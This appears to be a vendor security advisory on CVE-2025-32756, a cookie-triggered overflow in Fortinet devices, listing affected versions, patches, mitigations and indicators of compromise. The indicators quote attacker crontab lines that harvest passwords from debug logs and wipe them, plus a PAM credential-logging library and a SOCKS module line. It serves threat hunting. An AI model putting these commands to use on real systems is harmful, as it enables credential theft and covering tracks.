- May 15, 2025
Critical Vulnerabilities in multiple Fortinet devices under Active Exploitation (CVE-2025-32756)
On May 13th, Fortinet published an advisory regarding a critical buffer overflow vulnerability identified as CVE-2025-32756 affecting FortiVoice, FortiMail, FortiNDR, FortiRecorder, and FortiCamera devices. If exploited successfully, the vulnerability could allow unauthenticated attackers to execute arbitrary code or commands via malicious HTTP cookies.
Executive Summary
On May 13th, Fortinet published an advisory regarding a critical buffer overflow vulnerability identified as CVE-2025-32756 affecting FortiVoice, FortiMail, FortiNDR, FortiRecorder, and FortiCamera devices.
If exploited successfully, the vulnerability could allow unauthenticated attackers to execute arbitrary code or commands via malicious HTTP cookies. Fortinet has confirmed active exploitation in the wild, specifically targeting FortiVoice systems at the time of this writing.
Beazley Security strongly advises upgrading to the latest fixed versions as specified below and reviewing any affected systems for compromise. Beazley Security MXDR teams have already conducted threat hunts in client environments and continue to monitor for this threat.
Affected Systems or Products
This vulnerability impacts several products running FortiOS:
Affected System | Affected Versions | Solution |
FortiCamera 2.1 | 2.1.0 through 2.1.3 | Upgrade to 2.1.4 or above |
FortiCamera 2.0 | 2.0 all versions | Migrate to a fixed release |
FortiCamera 1.1 | 1.1 all versions | Migrate to a fixed release |
FortiMail 7.6 | 7.6.0 through 7.6.2 | Upgrade to 7.6.3 or above |
FortiMail 7.4 | 7.4.0 through 7.4.4 | Upgrade to 7.4.5 or above |
FortiMail 7.2 | 7.2.0 through 7.2.7 | Upgrade to 7.2.8 or above |
FortiMail 7.0 | 7.0.0 through 7.0.8 | Upgrade to 7.0.9 or above |
FortiNDR 7.6 | 7.6.0 | Upgrade to 7.6.1 or above |
FortiNDR 7.4 | 7.4.0 through 7.4.7 | Upgrade to 7.4.8 or above |
FortiNDR 7.2 | 7.2.0 through 7.2.4 | Upgrade to 7.2.5 or above |
FortiNDR 7.1 | 7.1 all versions | Migrate to a fixed release |
FortiNDR 7.0 | 7.0.0 through 7.0.6 | Upgrade to 7.0.7 or above |
FortiNDR 1.5 | 1.5 all versions | Migrate to a fixed release |
FortiNDR 1.4 | 1.4 all versions | Migrate to a fixed release |
FortiNDR 1.3 | 1.3 all versions | Migrate to a fixed release |
FortiNDR 1.2 | 1.2 all versions | Migrate to a fixed release |
FortiNDR 1.1 | 1.1 all versions | Migrate to a fixed release |
FortiRecorder 7.2 | 7.2.0 through 7.2.3 | Upgrade to 7.2.4 or above |
FortiRecorder 7.0 | 7.0.0 through 7.0.5 | Upgrade to 7.0.6 or above |
FortiRecorder 6.4 | 6.4.0 through 6.4.5 | Upgrade to 6.4.6 or above |
FortiVoice 7.2 | 7.2.0 | Upgrade to 7.2.1 or above |
FortiVoice 7.0 | 7.0.0 through 7.0.6 | Upgrade to 7.0.7 or above |
FortiVoice 6.4 | 6.4.0 through 6.4.10 | Upgrade to 6.4.11 or above |
Mitigations / Workarounds
Beazley Security Labs strongly recommends upgrading affected Fortinet devices to fixed versions listed in the table above. For systems where immediate patching is not feasible, Fortinet recommends disabling the HTTP/HTTPS administrative interface as a temporary workaround to mitigate exposure.
As this vulnerability affects FortiOS administrative interfaces, Beazley Security recommends that organizations take the following steps regardless of applying recently released patches:
Connect administrative interfaces to a trusted network segment that is not accessible from the internet.
Ideally, only allow network traffic from a dedicated management network to the administrative interface.
Deploy any internet-facing devices and services behind a web application firewall (WAF).
Patches
Fortinet has released patches to address CVE-2025-32756. To access and download firmware for Fortinet products, visit support.fortinet.com and log in with established account credentials. Within the support portal, navigate to firmware downloads and select the specific product to download latest firmware versions. If you do not have an active support contract with Fortinet, you may need to contact Fortinet support to discuss options for obtaining firmware updates.
Guidance on versions that contain fixes to affected products can be found in the Affected Systems and Products table above.
Indicators of Compromise
Fortinet identified several indicators of compromise associated with exploitation of CVE-2025-32756 within their FortiGuard advisory (FG-IR-25-254) that can be useful for threat hunting. It should be noted that most of these indicators were specific to the observed campaign and may change with exploitation from different threat actors:
Malicious IPs observed:
198.105.127.124
43.228.217.173
43.228.217.82
156.236.76.90
218.187.69.244
218.187.69.59
File hashes observed:
4410352e110f82eabc0bf160bec41d21 – wpad_ac_helper
ebce43017d2cb316ea45e08374de7315 - busybox
489821c38f429a21e1ea821f8460e590 – busybox
364929c45703a84347064e2d5de45bcd - libfmlogin.so
2c8834a52faee8d87cff7cd09c4fb946 – fmtest
Added or modified system files:
/bin/wpad_ac_helper - MD5:4410352e110f82eabc0bf160bec41d21 (malware)
/bin/busybox
/data/etc/crontab – line added
0 */12 * * * root busybox grep -rn passw /var/spool/crashlog/fcgi.debug > /var/spool/.sync; cat /dev/null >/var/spool/crashlog/fcgi.debug
/var/spool/cron/crontabs/root – line added
0 */12 * * * root cat /var/spool/crashlog/fcgi.debug > /var/spool/.sync; cat /dev/null >/var/spool/crashlog/fcgi.debug
/var/spool/.sync – credentials gathered into file
/etc/pam.d/sshd – lines added to include malicious libfmlogin.so, below
/lib/libfmlogin.so – malicious library used to log SSH username and password
/tmp/.sshdpm – contains credentials gathered by libfmlogin.so
/bin/fmtest – script to scan network
/etc/httpd.conf – line added to include socks.so
LoadModule socks5_module modules/mod_socks5.so
FCGI debugging – FortiGate states the following CLI command can be run to check the status of FCGI debugging:
diag debug application fcgi
If the output shows “general to-file ENABLED,” it means FCGI debugging has been enabled on the device, which is NOT the default setting.
Affected organizations should monitor for these IoCs and review system configurations for any unauthorized changes. For additional information, please refer to Fortinet’s official advisory.
Technical Details
While Fortinet's advisory provided limited technical details, the vulnerability within FortiOS software impacts multiple Fortinet systems, including FortiVoice, FortiMail, FortiNDR, FortiRecorder, and FortiCamera. The flaw allows remote unauthenticated attackers to launch the attack by sending specially crafted HTTP requests containing malicious hash cookies. Attacks in the wild have been observed against FortiVoice devices, likely due to the nature of their direct exposure on the internet.
According to Zeropath research, the flaw arises from improper bounds checking while processing HTTP requests on affected devices. When a maliciously crafted cookie is sent to the devices’ HTTP/HTTPS interface, it can cause a stack overflow, enabling attackers to overwrite memory. By sending the maliciously crafted hash cookie, an attacker can potentially trigger a buffer overflow in an attempt to force affected appliances and devices to execute arbitrary commands and gain unauthorized access.
Attackers have purportedly exploited the vulnerability by targeting exposed HTTPS administrative interfaces on vulnerable devices. Observed post-exploitation activity includes conducting network scans, erasing crash logs, enabling built-in debug features to capture credentials, and deploying backdoor malware on compromised devices.
How Beazley Security is responding
Beazley Security is monitoring client perimeter devices through our Karma product to identify impacted devices and support organizations in remediation of any issues found.
We are also conducting threat hunts across our MXDR environment to detect potential exploitation attempts against our clients.